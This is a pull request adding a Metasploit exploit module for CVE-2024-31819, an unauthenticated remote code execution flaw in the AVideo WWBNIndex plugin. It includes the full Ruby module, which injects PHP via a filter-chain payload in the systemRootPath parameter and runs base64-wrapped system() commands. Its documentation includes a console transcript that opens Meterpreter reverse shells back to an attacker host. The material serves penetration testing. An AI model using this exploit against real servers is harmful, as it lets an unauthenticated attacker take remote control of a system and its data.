### PR TITLE
Add Exploit Module for CVE-2024-31819 in AVideo WWBNIndex Plugin

### DIFF
--- a/documentation/modules/exploit/multi/http/avideo_wwbnindex_unauth_rce.md
+++ b/documentation/modules/exploit/multi/http/avideo_wwbnindex_unauth_rce.md
@@ -9,7 +9,7 @@ to execute arbitrary PHP code on the server.
 The vulnerability is present in versions from 12.4 up to 14.2.
 
 To set up a vulnerable environment for testing, follow the installation steps provided in the AVideo documentation for running with Docker:
-<https://github.com/WWBN/AVideo/wiki/Running-AVideo-with-Docker>. Ensure AVideo version installed is between 12.4 and 14.2.
+<https://github.com/WWBN/AVideo/wiki/Running-AVideo-with-Docker>. Ensure AVideo version installed is between 12.4 and 14.2 and the WWBIndex plugin is installed -  this can be done by verifying `/var/www/html/AVideo/plugin/WWBNIndex` exists.
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/multi/http/avideo_wwbnindex_unauth_rce.md
+++ b/documentation/modules/exploit/multi/http/avideo_wwbnindex_unauth_rce.md
@@ -9,7 +9,9 @@ to execute arbitrary PHP code on the server.
 The vulnerability is present in versions from 12.4 up to 14.2.
 
 To set up a vulnerable environment for testing, follow the installation steps provided in the AVideo documentation for running with Docker:
-<https://github.com/WWBN/AVideo/wiki/Running-AVideo-with-Docker>. Ensure AVideo version installed is between 12.4 and 14.2 and the WWBIndex plugin is installed -  this can be done by verifying `/var/www/html/AVideo/plugin/WWBNIndex` exists.
+<https://github.com/WWBN/AVideo/wiki/Running-AVideo-with-Docker>.
+Ensure AVideo version installed is between 12.4 and 14.2 and the WWBIndex plugin is installed.
+This can be done by verifying `/var/www/html/AVideo/plugin/WWBNIndex` exists.
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/multi/http/avideo_wwbnindex_unauth_rce.md
+++ b/documentation/modules/exploit/multi/http/avideo_wwbnindex_unauth_rce.md
@@ -1,0 +1,137 @@
+## Vulnerable Application
+
+This Metasploit module exploits an unauthenticated Remote Code Execution vulnerability in the AVideo platform,
+specifically within the WWBNIndex plugin.
+The vulnerability exists due to improper input validation in the `submitIndex.php` file, where the `systemRootPath` parameter
+is directly passed to a `require()` PHP function without proper sanitization.
+Attackers can exploit this by leveraging the PHP filter chaining technique
+to execute arbitrary PHP code on the server.
+The vulnerability is present in versions from 12.4 up to 14.2.
+
+To set up a vulnerable environment for testing, follow the installation steps provided in the AVideo documentation for running with Docker:
+<https://github.com/WWBN/AVideo/wiki/Running-AVideo-with-Docker>. Ensure AVideo version installed is between 12.4 and 14.2.
+
+## Verification Steps
+
+1. Start `msfconsole` in your Metasploit framework.
+2. Use the module: `use exploit/multi/http/avideo_wwbnindex_unauth_rce`.
+3. Set `RHOSTS` to the target's address where the AVideo platform is installed.
+4. Set `TARGETURI` to the base path of the AVideo installation if it is not at the root directory (default is `/`).
+5. Optionally, configure other options such as `SSL` and `RPORT` if the target environment requires it.
+6. Execute the exploit using the `run` or `exploit` command.
+7. If the target is vulnerable, the module will execute the specified payload, granting access according to the payload's capabilities.
+
+## Options
+
+No options
+
+## Scenarios
+
+### Successful Exploitation against AVideo Platform with WWBNIndex plugin version 12.9
+
+**Setup**:
+
+- Target: AVideo platform with WWBNIndex plugin version 12.9 installed in a Docker container.
+- Attacker: Metasploit Framework.
+
+**Example**:
+
+```
+msf6 > search avideo
+
+Matching Modules
+================
+
+   #  Name                                            Disclosure Date  Rank       Check  Description
+   -  ----                                            ---------------  ----       -----  -----------
+   0  exploit/multi/http/avideo_wwbnindex_unauth_rce  2024-04-04       excellent  Yes    AVideo WWBNIndex Plugin Unauthenticated RCE
+   1    \_ target: Automatic                          .                .          .      .
+   2    \_ target: PHP In-Memory                      .                .          .      .
+   3    \_ target: Unix In-Memory                     .                .          .      .
+   4    \_ target: Windows In-Memory                  .                .          .      .
+
+
+Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/avideo_wwbnindex_unauth_rce
+After interacting with a module you can manually set a TARGET with set TARGET 'Windows In-Memory'
+
+msf6 > use 3
+[*] Additionally setting TARGET => Unix In-Memory
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > options
+
+Module options (exploit/multi/http/avideo_wwbnindex_unauth_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      nhjkrZakk        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST                                yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   Unix In-Memory
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > set rhosts 192.168.100.20
+rhosts => 192.168.100.20
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > set lhost eth0
+lhost => 192.168.100.10
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > set lport 1337
+lport => 1337
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > set fetch_srvport 5000
+fetch_srvport => 5000
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.10:1337
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Detected vulnerable AVideo version: 12.9
+[*] Sending stage (3045380 bytes) to 192.168.100.20
+[*] Meterpreter session 1 opened (192.168.100.10:1337 -> 192.168.100.20:52936) at 2024-04-04 23:08:05 +0200
+
+meterpreter > sysinfo
+Computer     : 192.168.100.20
+OS           : Ubuntu 20.04 (Linux 5.4.0-169-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > exit
+[*] Shutting down session: 1
+
+[*] 192.168.100.20 - Meterpreter session 1 closed.  Reason: Died
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > use 2
+[*] Additionally setting TARGET => PHP In-Memory
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.10:1337
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Detected vulnerable AVideo version: 12.9
+[*] Sending stage (39927 bytes) to 192.168.100.20
+[*] Meterpreter session 2 opened (192.168.100.10:1337 -> 192.168.100.20:36258) at 2024-04-04 23:08:44 +0200
+
+meterpreter > getuid
+Server username: www-data
+```

--- a/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
+++ b/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
@@ -41,27 +41,24 @@ class MetasploitModule < Msf::Exploit::Remote
             'PHP In-Memory',
             {
               'Platform' => 'php',
-              'Arch' => ARCH_PHP,
-              'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },
-              'Type' => :php_memory
+              'Arch' => ARCH_PHP
+              # tested with php/meterpreter/reverse_tcp
             }
           ],
           [
             'Unix In-Memory',
             {
               'Platform' => ['unix', 'linux'],
-              'Arch' => ARCH_CMD,
-              'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp' },
-              'Type' => :unix_memory
+              'Arch' => ARCH_CMD
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
             }
           ],
           [
             'Windows In-Memory',
             {
               'Platform' => 'win',
-              'Arch' => ARCH_CMD,
+              'Arch' => ARCH_CMD
               # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
-              'Type' => :win_memory
             }
           ],
         ],

--- a/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
+++ b/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    php_code = "<?php #{payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"
+    php_code = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"
     filter_payload = generate_php_filter_payload(php_code)
     send_request_cgi(
       'method' => 'POST',

--- a/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
+++ b/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
@@ -87,6 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype' => 'application/x-www-form-urlencoded',
       'data' => "systemRootPath=#{filter_payload}"
     )
+    print_error("Server returned #{res.code}. Successful exploit attempts should not return a response.") if res&.code
   end
 
   def check

--- a/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
+++ b/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => 'win',
               'Arch' => ARCH_CMD,
-              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp' },
+              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
               'Type' => :win_memory
             }
           ],

--- a/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
+++ b/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
@@ -107,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
     version = Rex::Version.new(version_match[1])
 
     if version.between?(Rex::Version.new('12.4'), Rex::Version.new('14.2'))
-      return CheckCode::Vulnerable("Detected vulnerable AVideo version: #{version}")
+      return CheckCode::Appears("Detected vulnerable AVideo version: #{version}")
     end
 
     CheckCode::Safe("Detected non-vulnerable AVideo version: #{version}")

--- a/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
+++ b/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
@@ -1,0 +1,115 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::PhpFilterChain
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'AVideo WWBNIndex Plugin Unauthenticated RCE',
+        'Description' => %q{
+          This module exploits an unauthenticated remote code execution (RCE) vulnerability
+          in the WWBNIndex plugin of the AVideo platform. The vulnerability exists within the
+          `submitIndex.php` file, where user-supplied input is passed directly to the `require()`
+          function without proper sanitization. By exploiting this, an attacker can leverage the
+          PHP filter chaining technique to execute arbitrary PHP code on the server. This allows
+          for the execution of commands and control over the affected system. The exploit is
+          particularly dangerous because it does not require authentication, making it possible
+          for any remote attacker to exploit this vulnerability.
+        },
+        'Author' => [
+          'Valentin Lobstein'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-31819'],
+          ['URL', 'https://github.com/WWBN/AVideo'],
+          ['URL', 'https://chocapikk.com/posts/2024/cve-2024-31819']
+        ],
+        'Platform' => ['php', 'unix', 'linux', 'win'],
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Targets' => [
+          [
+            'PHP In-Memory',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },
+              'Type' => :php_memory
+            }
+          ],
+          [
+            'Unix In-Memory',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp' },
+              'Type' => :unix_memory
+            }
+          ],
+          [
+            'Windows In-Memory',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp' },
+              'Type' => :win_memory
+            }
+          ],
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2024-04-09',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        },
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 443,
+          'FETCH_WRITABLE_DIR' => '/tmp'
+        }
+      )
+    )
+  end
+
+  def exploit
+    php_code = "<?php #{payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"
+    filter_payload = generate_php_filter_payload(php_code)
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'data' => "systemRootPath=#{filter_payload}"
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'method' => 'GET',
+      'follow_redirect' => true
+    })
+    return CheckCode::Unknown('Failed to connect to the target.') unless res
+    return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res
+
+    version_match = res.body.match(/Powered by AVideo ® Platform v([\d.]+)/) || res.body.match(/<!--.*?v:([\d.]+).*?-->/m)
+    return CheckCode::Unknown('Unable to extract AVideo version.') unless version_match && version_match[1]
+
+    version = Rex::Version.new(version_match[1])
+
+    if version.between?(Rex::Version.new('12.4'), Rex::Version.new('14.2'))
+      return CheckCode::Vulnerable("Detected vulnerable AVideo version: #{version}")
+    end
+
+    CheckCode::Safe("Detected non-vulnerable AVideo version: #{version}")
+  end
+end

--- a/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
+++ b/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     php_code = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"
     filter_payload = generate_php_filter_payload(php_code)
-    send_request_cgi(
+    res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),
       'ctype' => 'application/x-www-form-urlencoded',

--- a/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
+++ b/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
@@ -103,12 +103,12 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown('Unable to extract AVideo version.') unless version_match && version_match[1]
 
     version = Rex::Version.new(version_match[1])
-        plugin_check = send_request_cgi({
-                                      'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex','submitIndex.php'),
-                                      'method' => 'GET',
-                                    })
+    plugin_check = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),
+      'method' => 'GET'
+    })
     unless plugin_check&.code == 200
-      CheckCode::Safe("Vulnerable plugin WWBNIndex was not detected")
+      CheckCode::Safe('Vulnerable plugin WWBNIndex was not detected')
     end
 
     if version.between?(Rex::Version.new('12.4'), Rex::Version.new('14.2'))

--- a/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
+++ b/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
@@ -105,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Remote
     version = Rex::Version.new(version_match[1])
 
     if version.between?(Rex::Version.new('12.4'), Rex::Version.new('14.2'))
-      return CheckCode::Appears("Detected vulnerable AVideo version: #{version}")
+      return CheckCode::Appears("Detected vulnerable AVideo version: #{version}, with vulnerable plugin WWBNIndex running.")
     end
 
     CheckCode::Safe("Detected non-vulnerable AVideo version: #{version}")

--- a/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
+++ b/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
@@ -99,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'follow_redirect' => true
     })
     return CheckCode::Unknown('Failed to connect to the target.') unless res
-    return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res
+    return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200
 
     version_match = res.body.match(/Powered by AVideo ® Platform v([\d.]+)/) || res.body.match(/<!--.*?v:([\d.]+).*?-->/m)
     return CheckCode::Unknown('Unable to extract AVideo version.') unless version_match && version_match[1]

--- a/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
+++ b/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
@@ -103,6 +103,13 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown('Unable to extract AVideo version.') unless version_match && version_match[1]
 
     version = Rex::Version.new(version_match[1])
+        plugin_check = send_request_cgi({
+                                      'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex','submitIndex.php'),
+                                      'method' => 'GET',
+                                    })
+    unless plugin_check&.code == 200
+      CheckCode::Safe("Vulnerable plugin WWBNIndex was not detected")
+    end
 
     if version.between?(Rex::Version.new('12.4'), Rex::Version.new('14.2'))
       return CheckCode::Appears("Detected vulnerable AVideo version: #{version}, with vulnerable plugin WWBNIndex running.")


### PR DESCRIPTION
Greetings Metasploit Team,

I've developed an exploit module targeting a recently discovered vulnerability, CVE-2024-31819, in the AVideo platform's WWBNIndex plugin. This critical Remote Code Execution (RCE) vulnerability allows unauthenticated attackers to execute arbitrary code on vulnerable installations of AVideo from v12.4 to v14.2.

Module Details:

- Vulnerability: CVE-2024-31819
- Documentation: Included detailed steps for verification, a breakdown of the exploit's mechanics.

This module aims to provide the Metasploit community with the tools necessary to test their systems against this severe security flaw. I believe it will be a valuable addition to the Metasploit framework, aiding in the ongoing efforts to improve cybersecurity defenses.

I look forward to your feedback and am happy to make any required adjustments to meet the project's standards.

Thank you for considering this contribution.

Best regards,
Chocapikk